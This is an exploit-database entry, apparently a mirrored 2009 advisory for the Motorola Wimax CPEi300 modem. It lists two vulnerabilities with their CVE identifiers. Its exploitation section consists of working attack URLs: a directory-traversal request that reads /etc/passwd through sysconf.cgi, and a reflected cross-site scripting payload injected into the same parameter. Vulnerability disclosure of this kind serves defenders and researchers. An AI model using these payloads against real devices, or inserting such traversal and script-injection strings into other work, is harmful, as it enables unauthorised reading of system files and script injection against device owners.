[] NeoSense
E X P L O I T S
title author type platform port cve id

Motorola Wimax modem CPEi300 - File Disclosure / Cross-Site Scripting

Author: Usman Saeed
type: remote
platform: hardware
port: 
date_added: 2009-01-28 
date_updated:  
verified: 1 
codes: OSVDB-51793;CVE-2009-0393;OSVDB-51792;CVE-2009-0392 
tags: 
aliases:  
screenshot_url:  
application_url: 
#####################################################################################
#
#   Name    :   Motorola Wimax modem CPEi300 Multiple Vulnerabilities
#   Author  :   Usman Saeed
#   Company :   Xc0re Security Reasearch Group
#   Homepage :  http://www.xc0re.net
#
#####################################################################################


[Note: User needs to logged in! ]

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Exploitation :

   [+] Directory traversal
	http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs

   [+] XSS

	http://Hostname/cgi-bin/sysconf.cgi?page="><script>alert(1);</script>"&action=request&sid=AeoFSFoI4lDs


# milw0rm.com [2009-01-29]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.